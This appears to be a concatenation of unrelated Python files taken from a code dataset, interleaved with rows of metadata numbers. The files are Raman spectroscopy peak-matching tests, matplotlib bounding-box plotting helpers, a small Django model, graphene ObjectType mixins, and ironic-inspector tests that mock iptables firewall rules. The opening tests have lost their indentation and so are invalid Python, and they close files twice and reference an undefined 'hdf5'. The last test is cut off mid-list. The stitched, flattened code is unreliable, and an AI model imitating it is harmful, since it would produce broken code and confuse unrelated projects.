try:
maxscores = peakidentify.score_max(row_i, row_j, -1, precision)
except ValueError:
print("An invalid k value was passed to the function, "
"and was handled correctly.")
# Run Function for arrays
try:
arrmaxscores = peakidentify.score_max(arraya[0], arraya[1], -1, precision)
except ValueError:
print("An invalid k value was passed to the function, "
"and was handled correctly.")
# Run good examples
maxscores = peakidentify.score_max(row_i, row_j, k, precision)
arrmaxscores = peakidentify.score_max(arraya[0], arraya[1], k, precision)
# make assertions
assert len(arrmaxscores[0]) == len(arraycat), """Output list length different
than concatenated lists length"""
for i, _ in enumerate(rowcat):
assert 0 <= arrmaxscores[0][i] <= 2, 'Output value outside acceptable range'
assert 0 <= maxscores[0][i] <= 2, 'Output value outside acceptable range'
for i, _ in enumerate(maxscores, 1):
assert maxscores[0][i-1] >= maxscores[0][-1], """Output values are
less than the max value"""
def test_score_sort():
"""
Evaluates the functionality of the score_sort function
"""
# Initialize the test arguments
row_i = [0, 1]
row_j = [2, 1]
rowcat = row_i + row_j
arraya = np.array([[0, 1], [2, 1], [0, 3]])
k = 2
precision = 10
arraycat = np.concatenate((arraya[0], arraya[1]))
# Run Previous Function to get max score normalization
maxscores = peakidentify.score_max(row_i, row_j, k, precision)
# Run Function for lists
try:
sortedscores = peakidentify.score_sort(row_i, row_j, max(maxscores[0]), precision)
except TypeError:
print("An invalid maxscores from score_max was passed to the function, "
"and was handled correctly.")
# Run Function for arrays
try:
arrsortedscores = peakidentify.score_sort(arraya[0], arraya[1],
max(maxscores[0]),
precision)
except TypeError:
print("An invalid maxscores from score_max was passed to the function, "
"and was handled correctly.")
# Run good examples
sortedscores = peakidentify.score_sort(row_i, row_j,
int(max(maxscores[0])),
precision)
arrsortedscores = peakidentify.score_sort(arraya[0], arraya[1],
int(max(maxscores[0])),
precision)
# make assertions
assert len(arraycat) == len(arrsortedscores[0][0]), """Output list length
different than concatenated lists length"""
assert len(rowcat) == len(sortedscores[0][0]), """Output list length
different than concatenated lists length"""
for i, _ in enumerate(sortedscores):
assert sortedscores[0][0][i] <= sortedscores[0][0][i+1], """Output values
is sorted from smallest to largest"""
assert arrsortedscores[0][0][i] <= arrsortedscores[0][0][i+1], """Output
values is sorted from smallest to largest"""
def test_process_score():
"""
Evaluates the functionality of the process_score function
and the input type errors are handled.
"""
hdf5_calfilename = 'ramandecompy/tests/test_files/peakidentify_calibration_test.hdf5'
hdf5_expfilename = 'ramandecompy/tests/test_files/peakidentify_experiment_test.hdf5'
key = '300C/25s'
calhdf5 = h5py.File(hdf5_calfilename, 'r+')
exphdf5 = h5py.File(hdf5_expfilename, 'r+')
unknown_x = list(exphdf5['{}/wavenumber'.format(key)])
unknown_y = list(exphdf5['{}/counts'.format(key)])
unknown_x = np.asarray(unknown_x)
unknown_y = np.asarray(unknown_y)
known_compound_list = list(calhdf5.keys())
precision = 10
key5 = 'water'
unknown_peaks = []
for i, _ in enumerate(list(exphdf5['{}'.format(key)])[:-3]):
if i < 9:
unknown_peaks.append(list(exphdf5['{}/Peak_0{}'.format(key, i+1)])[0][2])
else:
unknown_peaks.append(list(exphdf5['{}/Peak_{}'.format(key, i+1)])[0][2])
H2O_peaks = []
for _,peak in enumerate(list(calhdf5[key5])[:-3]):
H2O_peaks.append(list(calhdf5['{}/{}'.format(key5, peak)])[0][2])
precision = 10
unknownname = 'Formic3.6wt%'
knownname = 'water'
k=1
# run good examples
peakidentify.process_score(unknown_peaks,H2O_peaks,k, precision,unknownname,knownname)
#run bad inputs
try:
peakidentify.process_score('unknown_peaks',H2O_peaks,k, precision,unknownname,knownname)
except TypeError:
print("An invalid unknown_peaks from process_score was passed to the function, "
"and was handled correctly.")
try:
peakidentify.process_score(unknown_peaks,'known_peaks',k, precision,unknownname,knownname)
except TypeError:
print("An invalid known_peaks from process_score was passed to the function, "
"and was handled correctly.")
try:
peakidentify.process_score(unknown_peaks,H2O_peaks,'k', precision,unknownname,knownname)
except TypeError:
print("An invalid k value from process_score was passed to the function, "
"and was handled correctly.")
try:
peakidentify.process_score(unknown_peaks,H2O_peaks,k, 'precision',unknownname,knownname)
except TypeError:
print("An invalid precision from process_score was passed to the function, "
"and was handled correctly.")
try:
peakidentify.process_score(unknown_peaks,H2O_peaks,k, precision,3,knownname)
except TypeError:
print("An invalid unknownname from process_score was passed to the function, "
"and was handled correctly.")
try:
peakidentify.process_score(unknown_peaks,H2O_peaks,k, precision,unknownname,3)
except TypeError:
print("An invalid knownname from process_score was passed to the function, "
"and was handled correctly.")
calhdf5.close()
exphdf5.close()
return
def test_score_table():
"""
Evaluates the functionality of the score_table function
and the input type errors are handled.
"""
hdf5_calfilename = 'ramandecompy/tests/test_files/peakidentify_calibration_test.hdf5'
hdf5_expfilename = 'ramandecompy/tests/test_files/peakidentify_experiment_test.hdf5'
key = '300C/25s'
calhdf5 = h5py.File(hdf5_calfilename, 'r+')
exphdf5 = h5py.File(hdf5_expfilename, 'r+')
unknown_x = list(exphdf5['{}/wavenumber'.format(key)])
unknown_y = list(exphdf5['{}/counts'.format(key)])
unknown_x = np.asarray(unknown_x)
unknown_y = np.asarray(unknown_y)
known_compound_list = list(calhdf5.keys())
precision = 10
key5 = 'water'
unknown_peaks = []
for i, _ in enumerate(list(exphdf5['{}'.format(key)])[:-3]):
if i < 9:
unknown_peaks.append(list(exphdf5['{}/Peak_0{}'.format(key, i+1)])[0][2])
else:
unknown_peaks.append(list(exphdf5['{}/Peak_{}'.format(key, i+1)])[0][2])
H2O_peaks = []
for _,peak in enumerate(list(calhdf5[key5])[:-3]):
H2O_peaks.append(list(calhdf5['{}/{}'.format(key5, peak)])[0][2])
precision = 10
unknownname = 'Formic3.6wt%'
knownname = 'H2O'
k=1
# run good examples
peakidentify.score_table(unknown_peaks,H2O_peaks, precision,unknownname,knownname)
#run bad inputs
try:
peakidentify.score_table('unknown_peaks',H2O_peaks,precision,unknownname,knownname)
except TypeError:
print("An invalid unknown_peaks from score_max was passed to the function, "
"and was handled correctly.")
try:
peakidentify.score_table(unknown_peaks,'H2O_peaks',precision,unknownname,knownname)
except TypeError:
print("An invalid known_peaks from score_table was passed to the function, "
"and was handled correctly.")
try:
peakidentify.score_table(unknown_peaks,H2O_peaks,'precision',unknownname,knownname)
except TypeError:
print("An invalid precision from score_table was passed to the function, "
"and was handled correctly.")
try:
peakidentify.score_table(unknown_peaks,H2O_peaks,precision,3,knownname)
except TypeError:
print("An invalid unknownname from score_table was passed to the function, "
"and was handled correctly.")
try:
peakidentify.score_table(unknown_peaks,H2O_peaks,precision,unknownname,3)
except TypeError:
print("An invalid knownname from score_table was passed to the function, "
"and was handled correctly.")
calhdf5.close()
exphdf5.close()
exphdf5.close()
calhdf5.close()
hdf5.close()
| 41.697326
| 98
| 0.567343
| 4,202
| 38,987
| 5.071633
| 0.070919
| 0.027685
| 0.036601
| 0.021022
| 0.8444
| 0.818216
| 0.787105
| 0.769696
| 0.720801
| 0.720801
| 0
| 0.02541
| 0.338831
| 38,987
| 935
| 99
| 41.697326
| 0.801335
| 0.080463
| 0
| 0.728716
| 0
| 0
| 0.206472
| 0.034075
| 0
| 0
| 0
| 0
| 0.037518
| 1
| 0.015873
| false
| 0.053391
| 0.008658
| 0
| 0.025974
| 0.066378
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
1dda2191697baa3f7dfbb1fb8b1423c88080dc9b
| 10,102
|
py
|
Python
|
lib/utils/show_boxes.py
|
chi3x10/RepMet
|
d5b13e01940bbb7ed59dd1ff073e03c0808f76c0
|
[
"Apache-2.0"
] | 103
|
2019-08-16T11:55:04.000Z
|
2022-03-04T16:47:57.000Z
|
lib/utils/show_boxes.py
|
chi3x10/RepMet
|
d5b13e01940bbb7ed59dd1ff073e03c0808f76c0
|
[
"Apache-2.0"
] | 33
|
2019-05-25T08:42:06.000Z
|
2022-03-08T21:32:10.000Z
|
lib/utils/show_boxes.py
|
chi3x10/RepMet
|
d5b13e01940bbb7ed59dd1ff073e03c0808f76c0
|
[
"Apache-2.0"
] | 18
|
2019-09-14T07:35:39.000Z
|
2021-11-25T04:25:20.000Z
|
# --------------------------------------------------------
# Deformable Convolutional Networks
# Copyright (c) 2017 Microsoft
# Copyright (c) 2019 IBM Corp
# Licensed under The Apache-2.0 License [see LICENSE for details]
# Written by Yi Li, Haocheng Zhang
# --------------------------------------------------------
import matplotlib.pyplot as plt
import warnings
import matplotlib.cbook
warnings.filterwarnings("ignore",category=matplotlib.cbook.mplDeprecation)
plt.switch_backend('agg')
from random import random as rand
def show_detsB_gt_boxes(im, dets_B, gt_boxes, gt_classes, scale = 1.0, save_file_path='temp_det_gt.png'):
import matplotlib.pyplot as plt
from random import random as rand
fig = plt.figure(1)
FS = 22
fig.set_size_inches((2 * 8.5, 1 * 11), forward=False)
plt.subplot(121)
plt.cla()
plt.axis("off")
plt.imshow(im)
for det in dets_B:
det_row = det[0]
cat_name = det[1]
bbox = det_row[:4] * scale
color = (rand(), rand(), rand())
rect = plt.Rectangle((bbox[0], bbox[1]),
bbox[2] - bbox[0],
bbox[3] - bbox[1], fill=False,
edgecolor=color, linewidth=3.5)
plt.gca().add_patch(rect)
score = det_row[-1]
plt.gca().text(bbox[0], bbox[1],
'{:s} {:.3f}'.format(cat_name, score),
bbox=dict(facecolor=color, alpha=0.5), fontsize=FS, color='white')
plt.subplot(122)
plt.cla()
plt.axis("off")
plt.imshow(im)
for cls_idx, cls_name in enumerate(gt_classes):
bbox = gt_boxes[cls_idx]
color = (rand(), rand(), rand())
rect = plt.Rectangle((bbox[0], bbox[1]),
bbox[2] - bbox[0],
bbox[3] - bbox[1], fill=False,
edgecolor=color, linewidth=3.5)
plt.gca().add_patch(rect)
plt.gca().text(bbox[0], bbox[1],
'{:s}'.format(cls_name),
bbox=dict(facecolor=color, alpha=0.5), fontsize=FS, color='white')
plt.gca().set_axis_off()
plt.subplots_adjust(top=1, bottom=0, right=1, left=0,
hspace=0, wspace=0)
plt.margins(0, 0)
fig.savefig(save_file_path, bbox_inches = 'tight', pad_inches = 0)
plt.close(fig)
def show_detsB_boxes(im, dets_B, scale = 1.0, save_file_path='temp.png'):
fig = plt.figure(1)
fig.set_size_inches((2 * 8.5, 2 * 11), forward=False)
plt.cla()
plt.axis("off")
plt.imshow(im)
for det in dets_B:
det_row = det[0]
cat_name = det[2]
bbox = det_row[:4] * scale
color = (rand(), rand(), rand())
rect = plt.Rectangle((bbox[0], bbox[1]),
bbox[2] - bbox[0],
bbox[3] - bbox[1], fill=False,
edgecolor=color, linewidth=2.5)
plt.gca().add_patch(rect)
score = det_row[-1]
plt.gca().text(bbox[0], bbox[1],
'{:s} {:.3f}'.format(cat_name, score),
bbox=dict(facecolor=color, alpha=0.5), fontsize=16, color='white')
fig.savefig(save_file_path)
def show_dets_crops(im,dets,classes,scale=1.0,marg=0,save_file_path='temp_det_gt.png'):
fig = plt.figure(2)
plt.cla()
fig.set_size_inches((8.5, 2 * 11), forward=False)
for cls_idx, cls_name in enumerate(classes):
cls_dets = dets[cls_idx]
for idet,det in enumerate(cls_dets):
plt.cla()
bbox = det[:4] * scale
#rect = im[int(bbox[0])-marg:int(bbox[2])+marg,int(bbox[1])-marg:int(bbox[3])+marg,:]
rect = im[int(bbox[1]) - marg:int(bbox[3]) + marg, int(bbox[0]) - marg:int(bbox[2]) + marg, :]
plt.imshow(rect)
score = det[-1]
plt.gca().set_axis_off()
plt.subplots_adjust(top=1, bottom=0, right=1, left=0,
hspace=0, wspace=0)
plt.margins(0, 0)
fig.savefig(save_file_path[:-4]+'_{0:.3f}_{1}.jpg'.format(score,idet), bbox_inches='tight', pad_inches=0)
def show_dets_gt_boxes(im, dets,classes, gt_boxes,gt_classes, scale = 1.0,FS=22,LW=3.5, save_file_path='temp_det_gt.png'):
import matplotlib.pyplot as plt
import numpy as np
from random import random as rand
from random import randint
fig = plt.figure(1)
fig.set_size_inches((2 * 8.5, 1 * 11), forward=False)
plt.subplot(121)
plt.cla()
plt.axis("off")
plt.imshow(im)
for cls_dets, cls_name in zip(dets,classes):
scores = []
if len(cls_dets)==0:
continue
for det in cls_dets:
scores+=[det[-1]]
ord = np.argsort(scores)
cls_dets = cls_dets[ord]
for det in cls_dets:
bbox = det[:4] * scale
color = (rand(), rand(), rand())
rect = plt.Rectangle((bbox[0], bbox[1]),
bbox[2] - bbox[0],
bbox[3] - bbox[1], fill=False,
edgecolor=color, linewidth=LW)
plt.gca().add_patch(rect)
score = det[-1]
corner = randint(1, 2)
if corner == 1:
x0 = bbox[0]; y0 = bbox[1]
if corner == 2:
x0 = bbox[0]; y0 = bbox[3]
# if corner == 3:
# x0 = bbox[2]; y0 = bbox[1]
# if corner == 4:
# x0 = bbox[2]; y0 = bbox[3]
plt.gca().text(x0,y0,
'{:s} {:.3f}'.format(cls_name, score),
bbox=dict(facecolor=color, alpha=0.6), fontsize=FS, color='white')
plt.subplot(122)
plt.cla()
plt.axis("off")
plt.imshow(im)
for cls_idx, cls_name in enumerate(gt_classes):
bbox = gt_boxes[cls_idx]
color = (rand(), rand(), rand())
rect = plt.Rectangle((bbox[0], bbox[1]),
bbox[2] - bbox[0],
bbox[3] - bbox[1], fill=False,
edgecolor=color, linewidth=LW)
plt.gca().add_patch(rect)
plt.gca().text(bbox[0], bbox[1],
'{:s}'.format(cls_name),
bbox=dict(facecolor=color, alpha=0.6), fontsize=FS, color='white')
plt.gca().set_axis_off()
plt.subplots_adjust(top=1, bottom=0, right=1, left=0,
hspace=0, wspace=0)
plt.margins(0, 0)
fig.savefig(save_file_path, bbox_inches = 'tight', pad_inches = 0)
plt.close(fig)
def show_boxes(im, dets, classes, scale = 1.0, save_file_path='temp.png'):
fig = plt.figure(1)
fig.set_size_inches((2 * 8.5, 2 * 11), forward=False)
plt.cla()
plt.axis("off")
plt.imshow(im)
for cls_dets, cls_name in zip(dets,classes):
# for cls_idx, cls_name in enumerate(classes):
# cls_dets = dets[cls_idx]
for det in cls_dets:
bbox = det[:4] * scale
color = (rand(), rand(), rand())
rect = plt.Rectangle((bbox[0], bbox[1]),
bbox[2] - bbox[0],
bbox[3] - bbox[1], fill=False,
edgecolor=color, linewidth=2.5)
plt.gca().add_patch(rect)
if cls_dets.shape[1] == 5:
score = det[-1]
plt.gca().text(bbox[0], bbox[1],
'{:s} {:.3f}'.format(cls_name, score),
bbox=dict(facecolor=color, alpha=0.5), fontsize=16, color='white')
# print('{:s}: {:.3f}'.format(cls_name, score))
#plt.show()
fig.savefig(save_file_path)
plt.close(fig)
return im
def show_gt_boxes(im, boxes, classes, scale = 1.0, save_file_path='temp.png'):
fig = plt.figure(1)
fig.set_size_inches((2 * 8.5, 2 * 11), forward=False)
plt.cla()
plt.axis("off")
plt.imshow(im)
for cls_idx, cls_name in enumerate(classes):
bbox = boxes[cls_idx]
color = (rand(), rand(), rand())
rect = plt.Rectangle((bbox[0], bbox[1]),
bbox[2] - bbox[0],
bbox[3] - bbox[1], fill=False,
edgecolor=color, linewidth=2.5)
plt.gca().add_patch(rect)
plt.gca().text(bbox[0], bbox[1],
'{:s}'.format(cls_name),
bbox=dict(facecolor=color, alpha=0.5), fontsize=16, color='white')
# print('{:s}: {:.3f}'.format(cls_name, score))
#plt.show()
fig.savefig(save_file_path)
plt.close(fig)
return im
def show_train_and_rois(im, box_tr, rois,save_file_path):
fig = plt.figure(1)
fig.set_size_inches((2 * 8.5, 2 * 11), forward=False)
plt.cla()
plt.axis("off")
plt.imshow(im)
color = (0,1,0)
for bbox in rois:
rect = plt.Rectangle((bbox[0], bbox[1]),
bbox[2] - bbox[0],
bbox[3] - bbox[1], fill=False,
edgecolor=color, linewidth=1.0)
plt.gca().add_patch(rect)
color = (1,0,0)
bbox = box_tr
rect = plt.Rectangle((bbox[0], bbox[1]),
bbox[2] - bbox[0],
bbox[3] - bbox[1], fill=False,
edgecolor=color, linewidth=2.5)
plt.gca().add_patch(rect)
fig.savefig(save_file_path)
def show_just_boxes(im, boxes, scale = 1.0, save_file_path='temp.png'):
fig = plt.figure(1)
fig.set_size_inches((2 * 8.5, 2 * 11), forward=False)
plt.cla()
plt.axis("off")
plt.imshow(im)
for bbox in enumerate(boxes):
color = (rand(), rand(), rand())
rect = plt.Rectangle((bbox[0], bbox[1]),
bbox[2] - bbox[0],
bbox[3] - bbox[1], fill=False,
edgecolor=color, linewidth=2.5)
plt.gca().add_patch(rect)
fig.savefig(save_file_path)
return im
| 35.321678
| 123
| 0.507127
| 1,362
| 10,102
| 3.643906
| 0.110866
| 0.030224
| 0.047149
| 0.032239
| 0.834777
| 0.810598
| 0.772114
| 0.7568
| 0.728189
| 0.728189
| 0
| 0.044224
| 0.330727
| 10,102
| 285
| 124
| 35.445614
| 0.689839
| 0.065631
| 0
| 0.804444
| 0
| 0
| 0.024947
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035556
| false
| 0
| 0.044444
| 0
| 0.093333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
38084c1c9cb74186e95e12f0a8c5dabdbf1ce6b2
| 103
|
py
|
Python
|
icekit/plugins/page_anchor/models.py
|
ic-labs/django-icekit
|
c507ea5b1864303732c53ad7c5800571fca5fa94
|
[
"MIT"
] | 52
|
2016-09-13T03:50:58.000Z
|
2022-02-23T16:25:08.000Z
|
icekit/plugins/page_anchor/models.py
|
ic-labs/django-icekit
|
c507ea5b1864303732c53ad7c5800571fca5fa94
|
[
"MIT"
] | 304
|
2016-08-11T14:17:30.000Z
|
2020-07-22T13:35:18.000Z
|
icekit/plugins/page_anchor/models.py
|
ic-labs/django-icekit
|
c507ea5b1864303732c53ad7c5800571fca5fa94
|
[
"MIT"
] | 12
|
2016-09-21T18:46:35.000Z
|
2021-02-15T19:37:50.000Z
|
from . import abstract_models
class PageAnchorItem(abstract_models.AbstractPageAnchorItem):
pass
| 17.166667
| 61
| 0.825243
| 10
| 103
| 8.3
| 0.8
| 0.337349
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.126214
| 103
| 5
| 62
| 20.6
| 0.922222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
69dcbaf180f25588720b1b1ae1213555bdd0cc05
| 916
|
py
|
Python
|
handlers/graphql/types/objecttype.py
|
pashazz/vmemperor
|
a0b53f67d75cccbd8e1e6a0419d85babab7041f5
|
[
"Apache-2.0"
] | 1
|
2019-02-02T15:01:32.000Z
|
2019-02-02T15:01:32.000Z
|
handlers/graphql/types/objecttype.py
|
pashazz/vmemperor
|
a0b53f67d75cccbd8e1e6a0419d85babab7041f5
|
[
"Apache-2.0"
] | null | null | null |
handlers/graphql/types/objecttype.py
|
pashazz/vmemperor
|
a0b53f67d75cccbd8e1e6a0419d85babab7041f5
|
[
"Apache-2.0"
] | null | null | null |
import graphene
class ObjectType(graphene.ObjectType):
'''
Implements mapping and iterable iterfaces around graphene's ObjectType so
we could pass our objects to other functions pythonically
'''
def __iter__(self):
for element in self._meta.fields:
yield element, getattr(self, element)
def keys(self):
return self._meta.fields.keys()
def __getitem__(self, item):
return getattr(self, item)
class InputObjectType(graphene.InputObjectType):
'''
Implements mapping and iterable iterfaces around graphene's ObjectType so
we could pass our objects to other functions pythonically
'''
def __iter__(self):
for element in self._meta.fields:
yield element, getattr(self, element)
def keys(self):
return self._meta.fields.keys()
def __getitem__(self, item):
return getattr(self, item)
| 24.105263
| 77
| 0.674672
| 108
| 916
| 5.537037
| 0.333333
| 0.053512
| 0.093645
| 0.093645
| 0.849498
| 0.849498
| 0.849498
| 0.849498
| 0.849498
| 0.849498
| 0
| 0
| 0.246725
| 916
| 37
| 78
| 24.756757
| 0.866667
| 0.287118
| 0
| 0.823529
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.352941
| false
| 0
| 0.058824
| 0.235294
| 0.764706
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 9
|
387068ce36ac09acafc39b86cc7ebb7d5f018a9a
| 19,157
|
py
|
Python
|
ironic_inspector/test/unit/test_firewall.py
|
mail2nsrajesh/ironic-inspector
|
7fa31ac6be2c1a03a0b2303b01e363cab14794a5
|
[
"Apache-2.0"
] | null | null | null |
ironic_inspector/test/unit/test_firewall.py
|
mail2nsrajesh/ironic-inspector
|
7fa31ac6be2c1a03a0b2303b01e363cab14794a5
|
[
"Apache-2.0"
] | null | null | null |
ironic_inspector/test/unit/test_firewall.py
|
mail2nsrajesh/ironic-inspector
|
7fa31ac6be2c1a03a0b2303b01e363cab14794a5
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2015 NEC Corporation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from oslo_config import cfg
from ironic_inspector.common import ironic as ir_utils
from ironic_inspector import firewall
from ironic_inspector import introspection_state as istate
from ironic_inspector import node_cache
from ironic_inspector.test import base as test_base
CONF = cfg.CONF
IB_DATA = """
EMAC=02:00:02:97:00:01 IMAC=97:fe:80:00:00:00:00:00:00:7c:fe:90:03:00:29:26:52
EMAC=02:00:00:61:00:02 IMAC=61:fe:80:00:00:00:00:00:00:7c:fe:90:03:00:29:24:4f
"""
@mock.patch.object(firewall, '_iptables')
@mock.patch.object(ir_utils, 'get_client')
@mock.patch.object(firewall.subprocess, 'check_call')
class TestFirewall(test_base.NodeTest):
CLIENT_ID = 'ff:00:00:00:00:00:02:00:00:02:c9:00:7c:fe:90:03:00:29:24:4f'
def test_update_filters_without_manage_firewall(self, mock_call,
mock_get_client,
mock_iptables):
CONF.set_override('manage_firewall', False, 'firewall')
firewall.update_filters()
self.assertEqual(0, mock_iptables.call_count)
def test_init_args(self, mock_call, mock_get_client, mock_iptables):
rootwrap_path = '/some/fake/path'
CONF.set_override('rootwrap_config', rootwrap_path)
firewall.init()
init_expected_args = [
('-D', 'INPUT', '-i', 'br-ctlplane', '-p', 'udp', '--dport', '67',
'-j', CONF.firewall.firewall_chain),
('-F', CONF.firewall.firewall_chain),
('-X', CONF.firewall.firewall_chain),
('-N', CONF.firewall.firewall_chain)]
call_args_list = mock_iptables.call_args_list
for (args, call) in zip(init_expected_args, call_args_list):
self.assertEqual(args, call[0])
expected = ('sudo', 'ironic-inspector-rootwrap', rootwrap_path,
'iptables', '-w')
self.assertEqual(expected, firewall.BASE_COMMAND)
def test_init_args_old_iptables(self, mock_call, mock_get_client,
mock_iptables):
rootwrap_path = '/some/fake/path'
CONF.set_override('rootwrap_config', rootwrap_path)
mock_call.side_effect = firewall.subprocess.CalledProcessError(2, '')
firewall.init()
init_expected_args = [
('-D', 'INPUT', '-i', 'br-ctlplane', '-p', 'udp', '--dport', '67',
'-j', CONF.firewall.firewall_chain),
('-F', CONF.firewall.firewall_chain),
('-X', CONF.firewall.firewall_chain),
('-N', CONF.firewall.firewall_chain)]
call_args_list = mock_iptables.call_args_list
for (args, call) in zip(init_expected_args, call_args_list):
self.assertEqual(args, call[0])
expected = ('sudo', 'ironic-inspector-rootwrap', rootwrap_path,
'iptables',)
self.assertEqual(expected, firewall.BASE_COMMAND)
def test_init_kwargs(self, mock_call, mock_get_client, mock_iptables):
firewall.init()
init_expected_kwargs = [
{'ignore': True},
{'ignore': True},
{'ignore': True}]
call_args_list = mock_iptables.call_args_list
for (kwargs, call) in zip(init_expected_kwargs, call_args_list):
self.assertEqual(kwargs, call[1])
def test_update_filters_args(self, mock_call, mock_get_client,
mock_iptables):
# Pretend that we have nodes on introspection
node_cache.add_node(self.node.uuid, state=istate.States.waiting,
bmc_address='1.2.3.4')
firewall.init()
update_filters_expected_args = [
('-D', 'INPUT', '-i', 'br-ctlplane', '-p', 'udp', '--dport',
'67', '-j', CONF.firewall.firewall_chain),
('-F', CONF.firewall.firewall_chain),
('-X', CONF.firewall.firewall_chain),
('-N', CONF.firewall.firewall_chain),
('-D', 'INPUT', '-i', 'br-ctlplane', '-p', 'udp', '--dport',
'67', '-j', firewall.NEW_CHAIN),
('-F', firewall.NEW_CHAIN),
('-X', firewall.NEW_CHAIN),
('-N', firewall.NEW_CHAIN),
('-A', firewall.NEW_CHAIN, '-j', 'ACCEPT'),
('-I', 'INPUT', '-i', 'br-ctlplane', '-p', 'udp', '--dport',
'67', '-j', firewall.NEW_CHAIN),
('-D', 'INPUT', '-i', 'br-ctlplane', '-p', 'udp', '--dport',
'67', '-j', CONF.firewall.firewall_chain),
('-F', CONF.firewall.firewall_chain),
('-X', CONF.firewall.firewall_chain),
('-E', firewall.NEW_CHAIN, CONF.firewall.firewall_chain)
]
firewall.update_filters()
call_args_list = mock_iptables.call_args_list
for (args, call) in zip(update_filters_expected_args,
call_args_list):
self.assertEqual(args, call[0])
def test_update_filters_kwargs(self, mock_call, mock_get_client,
mock_iptables):
firewall.init()
update_filters_expected_kwargs = [
{'ignore': True},
{'ignore': True},
{'ignore': True},
{},
{'ignore': True},
{'ignore': True},
{'ignore': True},
{},
{},
{},
{'ignore': True},
{'ignore': True},
{'ignore': True}
]
firewall.update_filters()
call_args_list = mock_iptables.call_args_list
for (kwargs, call) in zip(update_filters_expected_kwargs,
call_args_list):
self.assertEqual(kwargs, call[1])
def test_update_filters_with_blacklist(self, mock_call, mock_get_client,
mock_iptables):
active_macs = ['11:22:33:44:55:66', '66:55:44:33:22:11']
inactive_mac = ['AA:BB:CC:DD:EE:FF']
self.macs = active_macs + inactive_mac
self.ports = [mock.Mock(address=m) for m in self.macs]
mock_get_client.port.list.return_value = self.ports
node_cache.add_node(self.node.uuid, mac=active_macs,
state=istate.States.finished,
bmc_address='1.2.3.4', foo=None)
firewall.init()
update_filters_expected_args = [
('-D', 'INPUT', '-i', 'br-ctlplane', '-p', 'udp', '--dport',
'67', '-j', CONF.firewall.firewall_chain),
('-F', CONF.firewall.firewall_chain),
('-X', CONF.firewall.firewall_chain),
('-N', CONF.firewall.firewall_chain),
('-D', 'INPUT', '-i', 'br-ctlplane', '-p', 'udp', '--dport',
'67', '-j', firewall.NEW_CHAIN),
('-F', firewall.NEW_CHAIN),
('-X', firewall.NEW_CHAIN),
('-N', firewall.NEW_CHAIN),
# Blacklist
('-A', firewall.NEW_CHAIN, '-m', 'mac', '--mac-source',
inactive_mac[0], '-j', 'DROP'),
('-A', firewall.NEW_CHAIN, '-j', 'ACCEPT'),
('-I', 'INPUT', '-i', 'br-ctlplane', '-p', 'udp', '--dport',
'67', '-j', firewall.NEW_CHAIN),
('-D', 'INPUT', '-i', 'br-ctlplane', '-p', 'udp', '--dport',
'67', '-j', CONF.firewall.firewall_chain),
('-F', CONF.firewall.firewall_chain),
('-X', CONF.firewall.firewall_chain),
('-E', firewall.NEW_CHAIN, CONF.firewall.firewall_chain)
]
firewall.update_filters(mock_get_client)
call_args_list = mock_iptables.call_args_list
for (args, call) in zip(update_filters_expected_args,
call_args_list):
self.assertEqual(args, call[0])
# check caching
mock_iptables.reset_mock()
firewall.update_filters(mock_get_client)
self.assertFalse(mock_iptables.called)
def test_update_filters_clean_cache_on_error(self, mock_call,
mock_get_client,
mock_iptables):
active_macs = ['11:22:33:44:55:66', '66:55:44:33:22:11']
inactive_mac = ['AA:BB:CC:DD:EE:FF']
self.macs = active_macs + inactive_mac
self.ports = [mock.Mock(address=m) for m in self.macs]
mock_get_client.port.list.return_value = self.ports
node_cache.add_node(self.node.uuid, mac=active_macs,
state=istate.States.finished,
bmc_address='1.2.3.4', foo=None)
firewall.init()
update_filters_expected_args = [
('-D', 'INPUT', '-i', 'br-ctlplane', '-p', 'udp', '--dport',
'67', '-j', firewall.NEW_CHAIN),
('-F', firewall.NEW_CHAIN),
('-X', firewall.NEW_CHAIN),
('-N', firewall.NEW_CHAIN),
# Blacklist
('-A', firewall.NEW_CHAIN, '-m', 'mac', '--mac-source',
inactive_mac[0], '-j', 'DROP'),
('-A', firewall.NEW_CHAIN, '-j', 'ACCEPT'),
('-I', 'INPUT', '-i', 'br-ctlplane', '-p', 'udp', '--dport',
'67', '-j', firewall.NEW_CHAIN),
('-D', 'INPUT', '-i', 'br-ctlplane', '-p', 'udp', '--dport',
'67', '-j', CONF.firewall.firewall_chain),
('-F', CONF.firewall.firewall_chain),
('-X', CONF.firewall.firewall_chain),
